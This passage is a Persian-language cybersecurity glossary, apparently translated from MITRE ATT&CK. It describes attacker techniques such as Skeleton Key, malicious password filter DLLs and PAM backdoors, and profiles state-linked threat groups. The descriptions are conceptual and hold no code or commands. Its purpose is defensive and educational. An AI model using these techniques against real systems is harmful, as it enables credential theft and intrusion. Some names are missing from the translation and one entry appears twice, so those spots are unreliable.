دشمنان ممکن است از spearphishing داخلی برای دسترسی به اطلاعات اضافی یا سوء استفاده از سایر کاربران در همان سازمان پس از اینکه قبلاً به حساب ها یا سیستم های موجود در محیط دسترسی داشتند، استفاده کنند. spearphishing داخلی یک حمله چند مرحله‌ای است که در آن یک حساب ایمیل یا با کنترل دستگاه کاربر با بدافزار نصب‌شده قبلی و یا با به خطر انداختن اعتبار حساب کاربر، متعلق به آن است. دشمنان سعی می کنند از یک حساب داخلی قابل اعتماد استفاده کنند تا احتمال فریب دادن هدف را افزایش دهند. دشمنان ممکن است از ضمیمه Spearphishing یا Spearphishing Link به عنوان بخشی از spearphishing داخلی برای تحویل بار یا هدایت مجدد به یک سایت خارجی برای گرفتن اعتبار از طریق Input Capture در سایت‌هایی که رابط‌های ورود ایمیل را تقلید می‌کنند، استفاده کنند. حوادث قابل توجهی وجود داشته است که در آن از spearphishing داخلی استفاده شده است. کمپین Eye Pyramid از ایمیل‌های فیشینگ با پیوست‌های مخرب برای جابجایی جانبی بین قربانیان استفاده کرد که در این فرآیند نزدیک به 18000 حساب ایمیل را به خطر انداخت. ارتش الکترونیک سوریه ( SEA) حساب های ایمیل در فایننشال تایمز ( FT) را به خطر انداخت تا اعتبار حساب های اضافی را به سرقت ببرد. هنگامی که FT از حمله مطلع شد و شروع به هشدار به کارکنان در مورد تهدید کرد، SEA ایمیل های فیشینگ را به تقلید از بخش فناوری اطلاعات فایننشال تایمز ارسال کرد و توانست حتی کاربران بیشتری را به خطر بیندازد.

انتقال ابزار ورودی

Ingress Tool Transfer

دشمنان ممکن است ابزارها یا فایل های دیگر را از یک سیستم خارجی به یک محیط در معرض خطر انتقال دهند. فایل ها ممکن است از یک سیستم کنترل شده توسط دشمن خارجی از طریق کانال فرمان و کنترل برای آوردن ابزارها به شبکه قربانی یا از طریق پروتکل های جایگزین با ابزار دیگری مانند FTP کپی شوند. همچنین می توان فایل ها را در مک و لینوکس با ابزارهای بومی مانند scp، rsync و sftp کپی کرد.

بازیابی سیستم را مهار کنید

Inhibit System Recovery

دشمنان ممکن است داده‌های سیستم عامل داخلی را حذف یا حذف کنند و خدماتی را که برای کمک به بازیابی یک سیستم خراب طراحی شده‌اند خاموش کنند تا از بازیابی جلوگیری کنند. سیستم‌های عامل ممکن است دارای ویژگی‌هایی باشند که می‌توانند به رفع سیستم‌های خراب کمک کنند، مانند کاتالوگ پشتیبان، کپی‌های سایه حجمی، و ویژگی‌های تعمیر خودکار. دشمنان ممکن است ویژگی های بازیابی سیستم را غیرفعال یا حذف کنند تا اثرات تخریب داده ها و داده های رمزگذاری شده برای تأثیر را افزایش دهند.

یک گروه جاسوسی سایبری است

Inception

Inception یک گروه جاسوسی سایبری است که حداقل از سال 2014 فعال است. این گروه صنایع و نهادهای دولتی متعددی را عمدتاً در روسیه هدف قرار داده است، اما در ایالات متحده و در سراسر اروپا، آسیا، آفریقا و خاورمیانه نیز فعال بوده است.

یک گروه مظنون به جاسوسی سایبری چینی

IndigoZebra

IndigoZebra یک گروه مظنون به جاسوسی سایبری چینی است که حداقل از سال 2014 دولت های آسیای مرکزی را هدف قرار داده است.

یک گروه مجرم سایبری

Indrik Spider

Indrik Spider یک گروه مجرم سایبری مستقر در روسیه است که حداقل از سال 2014 فعال بوده است. Indrik Spider در ابتدا با تروجان بانکی Dridex شروع به کار کرد و سپس در سال 2017 آنها شروع به اجرای عملیات باج افزار با استفاده از BitPaymer، WastedLocker، و باج افزار Hades کردند.

جیلبریک نوعی افزایش امتیاز است

jailbreak

برای حذف محدودیت های یک سیستم عامل، به ویژه iOS، از دستگاهی که آن سیستم عامل را اجرا می کند. جیلبریک نوعی افزایش امتیاز است. از آنجایی که کاربران معمولاً دستگاه‌های خود را جیلبریک می‌کنند، مجاز بودن جیلبریک به قراردادهای مجوز کاربر نهایی و قوانین قابل اجرا بستگی دارد.

تعریف هک ناخواسته

junk hack definition

هک درجه پایین برخی از اقلام غیرمحتمل که امکان به دست آوردن اطلاعات را به روشی بدیع و غیرمنتظره نشان می دهد، اما بهره برداری در دنیای واقعی آن است. احتمالاً بسیار دشوار است بنابراین یک تهدید از لحاظ نظری ممکن اما از نظر واقع بینانه بسیار غیرقابل قبول است.

یک گروه تهدید

Ke3chang

Ke3chang یک گروه تهدید منسوب به بازیگرانی است که خارج از چین فعالیت می کنند. Ke3chang چندین صنعت از جمله نفت، دولتی، نظامی و غیره را هدف قرار داده است.

یک گروه جاسوسی سایبری مستقر در کره شمالی

Kimsuky

کیمسوکی یک گروه جاسوسی سایبری مستقر در کره شمالی است که حداقل از سال 2012 فعال بوده است. این گروه ابتدا بر روی هدف قرار دادن نهادهای دولتی کره جنوبی، اتاق های فکر و افرادی که به عنوان متخصص در زمینه های مختلف شناسایی می شدند، تمرکز کرد و عملیات خود را گسترش داد تا شامل ایالات متحده شود. کشورها، روسیه، اروپا و سازمان ملل متحد. کیمسوکی فعالیت های جمع آوری اطلاعات خود را بر سیاست خارجی و مسائل امنیت ملی مرتبط با شبه جزیره کره، سیاست هسته ای و تحریم ها متمرکز کرده است. کیمسوکی مسئول سازش شرکت انرژی هیدرو و هسته‌ای کره در سال 2014 ارزیابی شد. کمپین های قابل توجه دیگر عبارتند از: STOLEN PENCIL (2018), Operation Kabar Cobra (2019), and Operation Smoke Screen تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه ها یا زیر گروه ها گزارش می دهند.

نوعی صفحه کلید

Keylogger

هر وسیله‌ای که توسط آن ضربه‌های کلید قربانیان به هنگام تایپ در آن ثبت می‌شوند. صفحه کلید فیزیکی کی لاگر می تواند یک راه حل نرم افزاری یا یک دستگاه سخت افزاری باشد که برای گرفتن هر چیزی استفاده می شود که کاربر ممکن است از جمله رمز عبور، پاسخ به سوالات محرمانه یا جزئیات و اطلاعات را تایپ کند ایمیل، چت و اسناد تشکیل دهید.

انتقال ابزار جانبی

Lateral Tool Transfer

دشمنان ممکن است ابزارها یا فایل های دیگر را بین سیستم ها در یک محیط در معرض خطر انتقال دهند. فایل‌ها ممکن است از یک سیستم به سیستم دیگر کپی شوند تا ابزارهای دشمن یا فایل‌های دیگر در طول یک عملیات به مرحله اجرا درآیند. دشمنان ممکن است فایل‌ها را به صورت جانبی بین سیستم‌های قربانی داخلی برای پشتیبانی از حرکت جانبی با استفاده از پروتکل‌های اشتراک‌گذاری فایل ذاتی مانند اشتراک‌گذاری فایل از طریق SMB به اشتراک‌گذاری‌های شبکه متصل یا با اتصالات احراز هویت شده با SMB/Windows Admin Shares یا Protocol Remote Desktop کپی کنند. همچنین می توان فایل ها را در مک و لینوکس با ابزارهای بومی مانند scp، rsync و sftp کپی کرد.

گروه تهدید سایبری تحت حمایت دولت کره شمالی

Lazarus Group

گروه لازاروس یک گروه تهدید سایبری تحت حمایت دولت کره شمالی است که به اداره کل شناسایی نسبت داده شده است. این گروه حداقل از سال 2009 فعال بوده است و گزارش شده است که مسئول حمله مخرب برف پاک کن در نوامبر 2014 علیه Sony Pictures Entertainment به عنوان بخشی از کمپینی به نام Operation Blockbuster by Novetta بوده است. بدافزار استفاده شده توسط Lazarus Group با سایر کمپین های گزارش شده از جمله Operation Flame، Operation 1 Mission، Operation Troy، DarkSeoul و Ten Days of Rain مرتبط است. تعاریف گروه کره شمالی دارای همپوشانی قابل توجهی هستند و برخی از محققان امنیتی همه فعالیت های سایبری تحت حمایت دولت کره شمالی را تحت نام گروه لازاروس به جای ردیابی خوشه‌ها یا زیر گروه ها مانند , , , and . گزارش می دهند.

یک گروه تهدید ایرانی

Leafminer

Leafminer یک گروه تهدید ایرانی است که حداقل از اوایل سال 2017 سازمان‌های دولتی و نهادهای تجاری در خاورمیانه را هدف قرار داده است.

گروه جاسوسی سایبری تحت حمایت دولت چین

Leviathan

لویاتان یک گروه جاسوسی سایبری تحت حمایت دولت چین است که به اداره امنیت ایالتی هاینان وزارت امنیت دولتی ( MSS) و یک شرکت فرانت وابسته به آن نسبت داده شده است. لویاتان که حداقل از سال 2009 فعال است، بخش های زیر را هدف قرار داده است: دانشگاه، هوافضا/هواپیمایی، زیست پزشکی، پایگاه صنعتی دفاعی، دولت، مراقبت های بهداشتی، تولید، دریایی، و حمل و نقل در سراسر ایالات متحده، کانادا، اروپا، خاورمیانه و آسیای جنوب شرقی.

یک گروه تهدید

Lotus Blossom

شکوفه لوتوس یک گروه تهدید است که سازمان های دولتی و نظامی در جنوب شرقی آسیا را هدف قرار داده است.

حرکت جانبی

Lateral movement

حرکت جانبی به تکنیک هایی اطلاق می شود که یک مهاجم سایبری پس از دستیابی به دسترسی اولیه، برای حرکت به عمق شبکه در جستجوی داده های حساس و سایر دارایی های با ارزش استفاده می کند.

خرابی حافظه

Memory Corruption

خرابی حافظه در یک برنامه کامپیوتری زمانی رخ می‌دهد که محتویات یک مکان حافظه به دلیل رفتار برنامه‌ای که از قصد برنامه نویس اصلی یا سازه‌های برنامه-زبان فراتر می‌رود، تغییر می‌کند. این را نقض ایمنی حافظه می‌نامند. محتمل‌ترین علت خرابی حافظه خطای برنامه نویسی است. وقتی از محتویات حافظه خراب بعداً در آن برنامه استفاده می‌شود، یا به خرابی برنامه می‌انجامد یا به رفتار برنامه عجیب و غریب می‌انجامد. نزدیک به 10 درصد از خرابی برنامه‌ها در سیستم‌های ویندوز به دلیل خرابی پشته است.

اصلاح فرآیند احراز هویت

Modify Authentication Process

دشمنان ممکن است مکانیسم‌ها و فرآیندهای احراز هویت را برای دسترسی به اعتبار کاربر تغییر دهند یا دسترسی غیرمجاز به حساب‌ها را فعال کنند. فرآیند احراز هویت توسط مکانیسم‌هایی مانند فرآیند تأیید اعتبار محلی امنیتی (LSASS) و مدیر حساب‌های امنیتی (SAM) در ویندوز، ماژول‌های احراز هویت قابل اتصال ( PAM) در سیستم‌های مبتنی بر یونیکس و پلاگین‌های مجوز در سیستم‌های MacOS انجام می‌شود. برای جمع آوری، ذخیره و تأیید اعتبار. با تغییر فرآیند احراز هویت، یک دشمن ممکن است بتواند بدون استفاده از حساب‌های معتبر به یک سرویس یا سیستم احراز هویت کند. دشمنان ممکن است به طور مخرب بخشی از این فرآیند را تغییر دهند تا اعتبارنامه ها را فاش کنند یا مکانیزم های احراز هویت را دور بزنند. اعتبار یا دسترسی به خطر افتاده ممکن است برای دور زدن کنترل‌های دسترسی قرار گرفته بر روی منابع مختلف در سیستم‌های درون شبکه استفاده شود و حتی ممکن است برای دسترسی دائمی به سیستم‌های راه دور و سرویس‌های موجود خارجی، مانند VPN، Outlook Web Access و دسک‌تاپ راه دور استفاده شود.

اصلاح فرآیند احراز هویت: احراز هویت کنترل کننده دامنه

Modify Authentication Process: Domain Controller Authentication

دشمنان ممکن است فرآیند احراز هویت را روی یک کنترل‌کننده دامنه وصله کنند تا مکانیسم‌های احراز هویت معمولی را دور بزنند و دسترسی به حساب‌ها را فعال کنند. بدافزار ممکن است برای تزریق اعتبار نادرست به فرآیند احراز هویت در یک کنترل‌کننده دامنه با هدف ایجاد یک درب پشتی مورد استفاده برای دسترسی به حساب و/یا اعتبار هر کاربر (مثلاً Skeleton Key) استفاده شود. Skeleton key از طریق وصله‌ای روی فرآیند تأیید هویت کنترل‌کننده دامنه سازمانی (LSASS ) با اعتبارنامه‌هایی کار می‌کند که دشمنان ممکن است از آن برای دور زدن سیستم احراز هویت استاندارد استفاده کنند. پس از اصلاح، دشمن می تواند از رمز عبور تزریق شده برای احراز هویت به عنوان حساب کاربری دامنه استفاده کند (تا زمانی که کلید اسکلت با راه اندازی مجدد کنترل کننده دامنه از حافظه پاک شود). دسترسی تایید شده ممکن است دسترسی بدون محدودیت به میزبان ها و یا منابع در محیط های احراز هویت تک عاملی را فعال کند.

اصلاح فرآیند احراز هویت: DLL فیلتر رمز عبور

Modify Authentication Process: Password Filter DLL

دشمنان ممکن است کتابخانه‌های پیوند پویا فیلتر رمز عبور مخرب ( DLL) را در فرآیند احراز هویت ثبت کنند تا اعتبار کاربر را پس از تأیید اعتبار به دست آورند. فیلترهای رمز عبور ویندوز مکانیزم های اجرای سیاست رمز عبور برای حساب های دامنه و محلی هستند. فیلترها به‌عنوان DLL پیاده‌سازی می‌شوند که حاوی روشی برای تأیید گذرواژه‌های احتمالی در برابر سیاست‌های رمز عبور هستند. DLL های فیلتر را می توان در رایانه های محلی برای حساب های محلی و/یا کنترل کننده های دامنه برای حساب های دامنه قرار داد. قبل از ثبت گذرواژه‌های جدید در مدیریت حساب‌های امنیتی ( SAM)، سازمان امنیت محلی ( LSA) از هر فیلتر ثبت‌شده درخواست تأیید اعتبار می‌کند. تا زمانی که هر فیلتر ثبت‌شده تأیید اعتبار نکند، هیچ تغییر احتمالی نمی‌تواند اعمال شود. دشمنان می توانند فیلترهای رمز عبور مخرب را برای جمع آوری اعتبار از رایانه های محلی و/یا کل دامنه ها ثبت کنند. برای انجام اعتبارسنجی مناسب، فیلترها باید اعتبارنامه متن ساده را از LSA دریافت کنند. یک فیلتر رمز عبور مخرب هر بار که درخواست رمز عبور انجام می‌شود، این اعتبارنامه‌های متن ساده را دریافت می‌کند.

اصلاح فرآیند احراز هویت: ماژول های احراز هویت قابل اتصال

Modify Authentication Process: Pluggable Authentication Modules

دشمنان ممکن است ماژول‌های احراز هویت قابل اتصال (PAM)را برای دسترسی به اعتبار کاربر تغییر دهند یا دسترسی غیرمجاز به حساب‌ها را فعال کنند. PAM یک سیستم مدولار از فایل‌های پیکربندی، کتابخانه‌ها و فایل‌های اجرایی است که احراز هویت را برای بسیاری از خدمات راهنمایی می‌کند. رایج‌ترین ماژول احراز هویت pam_unix.so است که اطلاعات احراز هویت حساب را در /etc/shadow و /etc/passwd بازیابی، تنظیم و تأیید می‌کند. دشمنان ممکن است اجزای سیستم PAM را برای ایجاد درهای پشتی تغییر دهند. مؤلفه‌های PAM، مانند pam_unix.so، می‌توانند وصله شوند تا مقادیر عرضه‌شده توسط دشمن دلخواه را به‌عنوان اعتبارنامه‌های قانونی بپذیرند.همچنین ممکن است از تغییرات مخرب سیستم PAM برای سرقت اطلاعات استفاده شود. دشمنان ممکن است منابع PAM را با کد آلوده کنند تا اطلاعات کاربری کاربر را جمع آوری کنند، زیرا مقادیر مبادله شده با اجزای PAM ممکن است متن ساده باشند زیرا PAM رمزهای عبور را ذخیره نمی کند.

اصلاح فرآیند احراز هویت: احراز هویت دستگاه شبکه

Modify Authentication Process: Network Device Authentication

دشمنان ممکن است از Patch System Image برای کدگذاری سخت رمز عبور در سیستم عامل استفاده کنند، بنابراین مکانیسم‌های احراز هویت بومی برای حساب‌های محلی در دستگاه‌های شبکه را دور می‌زنند. Modify System Image ممکن است شامل کدهای کاشته شده در سیستم عامل برای دستگاه های شبکه باشد تا با استفاده از یک رمز عبور خاص، دسترسی دشمنان را فراهم کند. این اصلاح شامل یک رمز عبور خاص است که از طریق پچ در تصویر سیستم عامل کاشته می شود. پس از تلاش برای احراز هویت، کد درج شده ابتدا بررسی می کند که آیا ورودی کاربر رمز عبور است یا خیر. اگر چنین است، دسترسی داده می شود. در غیر این صورت، کد کاشته شده اعتبارنامه را برای تأیید اعتبار بالقوه معتبر منتقل می کند.

ماتریکس موبایل

Mobile Matrix

ماتریس ها تکنیک های مربوط به دسترسی دستگاه و اثرات مبتنی بر شبکه را پوشش می دهند که می توانند توسط دشمنان بدون دسترسی به دستگاه مورد استفاده قرار گیرند. این ماتریکس حاوی اطلاعاتی برای پلتفرم‌های زیر است: Android، iOS.

ماسکه کردن

Masquerading

دشمنان ممکن است سعی کنند ویژگی‌های مصنوعات خود را دستکاری کنند تا آنها را برای کاربران و/یا ابزارهای امنیتی مشروع یا بی‌خطر جلوه دهند. پنهان کردن زمانی اتفاق می‌افتد که نام یا مکان یک شیء، مشروع یا مخرب، به منظور فرار از دفاع و مشاهده، دستکاری یا سوء استفاده شود. این ممکن است شامل دستکاری ابرداده فایل، فریب دادن کاربران به شناسایی نادرست نوع فایل، و دادن نام قانونی وظایف یا خدمات باشد. تغییر نام ابزارهای قابل سوء استفاده سیستم برای فرار از نظارت امنیتی نیز نوعی از ماسکه کردن است.

اصلاح فرآیند احراز هویت

Modify Authentication Process

دشمنان ممکن است مکانیسم‌ها و فرآیندهای احراز هویت را برای دسترسی به اعتبار کاربر تغییر دهند یا دسترسی غیرمجاز به حساب‌ها را فعال کنند. فرآیند احراز هویت توسط مکانیسم‌هایی مانند فرآیند تأیید اعتبار محلی امنیتی ( LSASS) و مدیر حساب‌های امنیتی (SAM) در ویندوز، ماژول‌های احراز هویت قابل اتصال در سیستم‌های مبتنی بر یونیکس و پلاگین‌های مجوز در سیستم‌های MacOS انجام می‌شود. برای جمع آوری، ذخیره و تأیید اعتبار. با تغییر فرآیند احراز هویت، یک دشمن ممکن است بتواند بدون استفاده از حساب‌های معتبر به یک سرویس یا سیستم احراز هویت کند. دشمنان ممکن است به طور مخرب بخشی از این فرآیند را تغییر دهند تا اعتبارنامه ها را فاش کنند یا مکانیزم های احراز هویت را دور بزنند. اعتبار یا دسترسی به خطر افتاده ممکن است برای دور زدن کنترل‌های دسترسی قرار گرفته بر روی منابع مختلف در سیستم‌های درون شبکه استفاده شود و حتی ممکن است برای دسترسی دائمی به سیستم‌های راه دور و سرویس‌های موجود خارجی، مانند VPN، Outlook Web Access و دسک‌تاپ راه دور استفاده شود.

اصلاح کردن زیرساخت محاسبات ابری

Modify Cloud Compute Infrastructure

یک دشمن ممکن است تلاش کند زیرساخت خدمات محاسباتی یک حساب ابری را برای فرار از دفاع تغییر دهد. یک تغییر در زیرساخت خدمات محاسباتی می تواند شامل ایجاد، حذف یا اصلاح یک یا چند مؤلفه مانند نمونه‌های محاسباتی، ماشین های مجازی و عکس های فوری باشد. مجوزهای به دست آمده از اصلاح اجزای زیرساخت ممکن است محدودیت هایی را که مانع از دسترسی به زیرساخت های موجود می شود دور بزنند. اصلاح اجزای زیرساخت همچنین ممکن است به دشمن اجازه دهد تا از شناسایی فرار کند و شواهد حضور آنها را حذف کند.

اصلاح کردن رجیستری

Modify Registry

دشمنان ممکن است با رجیستری ویندوز تعامل داشته باشند تا اطلاعات پیکربندی را در کلیدهای رجیستری پنهان کنند، اطلاعات را به عنوان بخشی از پاکسازی حذف کنند، یا به عنوان بخشی از تکنیک های دیگر برای کمک به تداوم و اجرا. دسترسی به مناطق خاصی از رجیستری به مجوزهای حساب بستگی دارد، برخی از آنها نیاز به دسترسی در سطح سرپرست دارند. ابزار خط فرمان داخلی Reg ممکن است برای اصلاح رجیستری محلی یا راه دور استفاده شود. ابزارهای دیگری نیز ممکن است مورد استفاده قرار گیرند، مانند ابزار دسترسی از راه دور، که ممکن است دارای عملکردی برای تعامل با رجیستری از طریق Windows API باشد. تغییرات رجیستری همچنین ممکن است شامل اقداماتی برای پنهان کردن کلیدها باشد، مانند اضافه کردن نام کلید با کاراکتر تهی، که هنگام خواندن از طریق Reg یا سایر ابزارهای کاربردی با استفاده از Win32 API باعث خطا می شود و/یا نادیده گرفته می شود. دشمنان ممکن است از این کلیدهای شبه پنهان برای پنهان کردن محموله ها/دستورهای استفاده شده برای حفظ پایداری سوء استفاده کنند. رجیستری یک سیستم راه دور ممکن است برای کمک به اجرای فایل ها به عنوان بخشی از حرکت جانبی اصلاح شود. این نیاز به سرویس رجیستری راه دور در سیستم مورد نظر دارد. اغلب حساب‌های معتبر همراه با دسترسی به اشتراک‌های مدیریت SMB/Windows سیستم راه دور برای ارتباطات RPC مورد نیاز است.

اصلاح تصویر سیستم

Modify System Image

دشمنان ممکن است تغییراتی در سیستم عامل دستگاه های شبکه تعبیه شده برای تضعیف دفاع و ارائه قابلیت‌های جدید برای خود ایجاد کنند. در چنین دستگاه‌هایی، سیستم‌عامل‌ها معمولاً یکپارچه هستند و بیشتر عملکرد و قابلیت‌های دستگاه در یک فایل واحد قرار دارند. برای تغییر سیستم عامل، حریف معمولاً فقط باید روی این یک فایل تأثیر بگذارد، آن را جایگزین یا اصلاح کند. این کار را می توان به صورت زنده در حافظه در طول زمان اجرای سیستم برای تأثیر فوری انجام داد، یا در ذخیره سازی برای اجرای تغییر در بوت بعدی دستگاه شبکه.

کانال های چند مرحله ای

Multi-Stage Channels

دشمنان ممکن است مراحل متعددی را برای فرماندهی و کنترل ایجاد کنند که تحت شرایط مختلف یا برای عملکردهای خاص به کار گرفته می شوند. استفاده از چند مرحله ممکن است کانال فرمان و کنترل را مبهم کند تا تشخیص را دشوارتر کند. ابزارهای دسترسی از راه دور برای دستورالعمل ها به سرور فرمان و کنترل مرحله اول تماس خواهند گرفت. مرحله اول ممکن است دارای قابلیت های خودکار برای جمع آوری اطلاعات اولیه میزبان، به روز رسانی ابزارها و آپلود فایل های اضافی باشد. دومین ابزار دسترسی از راه دور ( RAT) می تواند در آن نقطه آپلود شود تا میزبان را به سرور فرمان و کنترل مرحله دوم هدایت کند. مرحله دوم احتمالاً کاملتر خواهد بود و به دشمن اجازه می دهد تا از طریق پوسته معکوس و ویژگی های RAT اضافی با سیستم تعامل داشته باشد. مراحل مختلف احتمالاً به طور جداگانه بدون زیرساخت های همپوشانی میزبانی می شوند. لودر همچنین ممکن است دارای تماس های پشتیبان مرحله اول یا کانال های بازگشتی در صورت کشف و مسدود شدن مسیر ارتباطی مرحله اول اولیه باشد.

گروه جاسوسی سایبری

Machete

Machete یک گروه جاسوسی سایبری مشکوک به زبان اسپانیایی است که حداقل از سال 2010 فعال بوده است. این گروه عمدتاً فعالیت های خود را در آمریکای لاتین، با تأکید ویژه بر ونزوئلا، و همچنین در ایالات متحده، اروپا، روسیه و بخش هایی از آسیا متمرکز کرده است. Machete به طور کلی سازمان های برجسته مانند موسسات دولتی، سرویس های اطلاعاتی، و واحدهای نظامی، و همچنین شرکت های مخابراتی و برق را هدف قرار می دهد.

گروه تهدید تحت حمایت ایران

Magic Hound

Magic Hound یک گروه تهدید تحت حمایت ایران است که عملیات جاسوسی سایبری طولانی مدت و با منابع فشرده را انجام می دهد که احتمالاً از طرف سپاه پاسداران انقلاب اسلامی است. آنها حداقل از سال 2014 از طریق کمپین های مهندسی اجتماعی پیچیده، پرسنل نظامی و دولت ایالات متحده و خاورمیانه، دانشگاهیان، روزنامه نگاران و سازمان هایی مانند سازمان بهداشت جهانی (WHO) را هدف قرار داده اند.

گروه تهدید

menuPass

menuPass یک گروه تهدید است که حداقل از سال 2006 فعال بوده است. شناخته شده است که اعضای منفرد menuPass در ارتباط با اداره امنیت دولتی تیانجین وزارت امنیت دولتی چین (MSS)و برای شرکت توسعه علم و فناوری Huaying Haitai کار می کردند. menuPass مراقبت های بهداشتی، دفاعی، هوافضا، مالی، دریایی، بیوتکنولوژی، انرژی و بخش های دولتی را در سطح جهان با تاکید بر سازمان های ژاپنی هدف قرار داده است. در سال‌های 2016 و 2017، این گروه ارائه‌دهندگان خدمات فناوری اطلاعات ( MSPs) ، شرکت‌های تولیدی و معدنی، و یک دانشگاه را هدف قرار داده است.

Moafee

Moafee یک گروه تهدید است که به نظر می رسد از استان گواندونگ چین فعالیت می کند. به دلیل همپوشانی TTPها، از جمله ابزارهای سفارشی مشابه، تصور می شود که Moafee رابطه مستقیم یا غیرمستقیم با گروه تهدید DragonOK دارد.

گروه جاسوسی سایبری مستقر در چین

Mofang

Mofang احتمالاً یک گروه جاسوسی سایبری مستقر در چین است که به دلیل تقلید مکرر از زیرساخت های قربانی نامگذاری شده است. این دشمن حداقل از ماه می 2012 مشاهده شده است که حملات متمرکزی را علیه زیرساخت‌های دولتی و حیاتی در میانمار و همچنین چندین کشور و بخش دیگر از جمله صنایع نظامی، خودروسازی و تسلیحاتی انجام می‌دهد.

گروه تهدید کننده عرب زبان و با انگیزه سیاسی

Molerats

Molerats یک گروه تهدید کننده عرب زبان و با انگیزه سیاسی است که از سال 2012 فعالیت می کند. قربانیان این گروه عمدتاً در خاورمیانه، اروپا و ایالات متحده بوده اند.

گروه تهدید ایرانی

MuddyWater

MuddyWater یک گروه تهدید ایرانی است که عمدتاً کشورهای خاورمیانه را هدف قرار داده است و کشورهای اروپایی و آمریکای شمالی را نیز هدف قرار داده است. قربانیان این گروه عمدتاً در بخش مخابرات، دولتی (خدمات فناوری اطلاعات) و نفت هستند. فعالیت این گروه قبلاً به مرتبط بود، اما اعتقاد بر این است که این گروه یک گروه متمایز است که احتمالاً انگیزه آنها جاسوسی است.

یک عامل تهدید جاسوسی سایبری

Mustang Panda

Mustang Panda یک عامل تهدید جاسوسی سایبری مستقر در چین است که برای اولین بار در سال 2017 مشاهده شد، اما ممکن است حداقل از سال 2014 در حال انجام عملیات باشد. موستانگ پاندا نهادهای دولتی، غیرانتفاعی، مذهبی و سایر سازمان های غیر دولتی را در ایالات متحده و آلمان، مغولستان، میانمار، پاکستان، و ویتنام را مورد هدف قرار داده است.

چارچوب نیروی کار برای امنیت سایبری

NICE Framework(Workforce Framework for Cybersecurity)

چارچوب نیروی کار امنیت سایبری NICE پایه‌ای برای افزایش اندازه و توانایی نیروی کار امنیت سایبری ایالات متحده است. این یک تعریف مشترک از امنیت سایبری، یک لیست جامع از وظایف امنیت سایبری، دانش و مهارت‌ها و توانایی‌های مورد نیاز برای انجام این وظایف را ارائه می‌دهد. چارچوب NICEاز اجزای زیر تشکیل شده است: نقش‌های کاری، دقیق‌ترین گروه‌بندی کارهای امنیت سایبری شامل دانش، مهارت‌ها و توانایی‌های خاصی که برای انجام وظایف در نقش‌ها مورد نیاز است.

Native API

Native API

دشمنان ممکن است با رابط برنامه نویسی برنامه نویسی بومی سیستم عامل (API) برای اجرای رفتارها تعامل داشته باشند. APIهای بومی ابزاری کنترل‌شده برای فراخوانی سرویس‌های سیستم‌عامل سطح پایین در هسته، مانند مواردی که شامل سخت‌افزار/دستگاه‌ها، حافظه و فرآیندها هستند، ارائه می‌کنند. این API های بومی توسط سیستم عامل در هنگام بوت شدن سیستم (زمانی که سایر اجزای سیستم هنوز راه اندازی نشده اند) و همچنین انجام وظایف و درخواست ها در طول عملیات روتین مورد استفاده قرار می گیرند.

شاخص ملی امنیت سایبری

National Cyber Security Index

شاخص امنیت سایبری ملی یک شاخص زنده جهانی است که آمادگی کشورها را برای جلوگیری از تهدیدات سایبری و مدیریت حوادث سایبری اندازه گیری می کند. NCSI همچنین یک پایگاه داده با مدارک در دسترس عموم و ابزاری برای ظرفیت سازی امنیت سایبری ملی است.

پل مرزی شبکه

Network Boundary Bridging

دشمنان ممکن است با به خطر انداختن دستگاه های شبکه پیرامونی، مرزهای شبکه را پل بزنند. نقض این دستگاه‌ها ممکن است دشمن را قادر سازد تا محدودیت‌های مسیریابی ترافیک را که در غیر این صورت شبکه‌های قابل اعتماد و غیرقابل اعتماد را از هم جدا می‌کند، دور بزند. از دستگاه هایی مانند روترها و فایروال ها می توان برای ایجاد مرز بین شبکه های قابل اعتماد و غیرقابل اعتماد استفاده کرد. آنها با محدود کردن انواع ترافیک برای اجرای سیاست های سازمانی در تلاش برای کاهش ریسک ذاتی در چنین ارتباطاتی به این امر دست می یابند. محدودیت ترافیک را می توان با ممنوع کردن آدرس های IP، پورت های پروتکل لایه 4 یا از طریق بازرسی عمیق بسته برای شناسایی برنامه ها به دست آورد. برای مشارکت با بقیه شبکه، این دستگاه‌ها می‌توانند مستقیماً آدرس‌پذیر یا شفاف باشند، اما نحوه عملکرد آن‌ها هیچ تأثیری بر نحوه دور زدن دشمن در صورت به خطر انداختن آنها ندارد. هنگامی که یک دشمن کنترل چنین دستگاه مرزی را به دست می‌گیرد، می‌تواند اجرای سیاست‌های آن را دور بزند تا ترافیک ممنوعه معمولی را از مرز اعتماد بین دو شبکه جدا شده بدون مانع عبور دهد. با دستیابی به حقوق کافی بر روی دستگاه، دشمن می‌تواند دستگاه را به گونه‌ای پیکربندی مجدد کند که به ترافیک مورد نظر خود اجازه دهد، و به آنها اجازه می‌دهد تا به اهدافی مانند فرمان و کنترل از طریق Multi-hop Proxy یا استخراج داده‌ها از طریق Traffic Duplication دست یابند. در مواردی که یک دستگاه مرزی دو سازمان مجزا را از هم جدا می کند، دشمن همچنین می تواند حرکت جانبی را به محیط های قربانی جدید تسهیل کند.

استشمام شبکه

Network Sniffing

دشمنان ممکن است برای گرفتن اطلاعات در مورد یک محیط، از جمله مطالب احراز هویت ارسال شده از طریق شبکه، ترافیک شبکه را استشمام کنند. شنود شبکه به استفاده از رابط شبکه در یک سیستم برای نظارت یا ضبط اطلاعات ارسال شده از طریق یک اتصال سیمی یا بی سیم اشاره دارد. یک دشمن ممکن است یک رابط شبکه را در حالت بی‌وقفه قرار دهد تا به طور غیرفعال به داده‌های در حال انتقال از طریق شبکه دسترسی پیدا کند، یا از پورت‌های دهانه برای گرفتن مقدار بیشتری از داده استفاده کند. داده‌های جمع‌آوری‌شده از طریق این تکنیک ممکن است شامل اطلاعات کاربری کاربر، به‌ویژه آنهایی باشد که از طریق یک پروتکل ناامن و رمزگذاری نشده ارسال می‌شوند. تکنیک‌های مسمومیت با وضوح نام سرویس، مانند مسمومیت LLMNR/NBT-NS و SMB Relay نیز می‌تواند برای گرفتن اعتبار به وب‌سایت‌ها، پروکسی‌ها و سیستم‌های داخلی با هدایت ترافیک به یک دشمن استفاده شود. شنود شبکه همچنین ممکن است جزئیات پیکربندی، مانند سرویس‌های در حال اجرا، شماره نسخه، و سایر ویژگی‌های شبکه (مانند آدرس‌های IP، نام میزبان، شناسه‌های (VLAN) را که برای فعالیت‌های بعدی Lateral Movement and/or Defense Evasion activities ضروری هستند، نشان دهد.

اسکن خدمات شبکه

Network Service Scanning

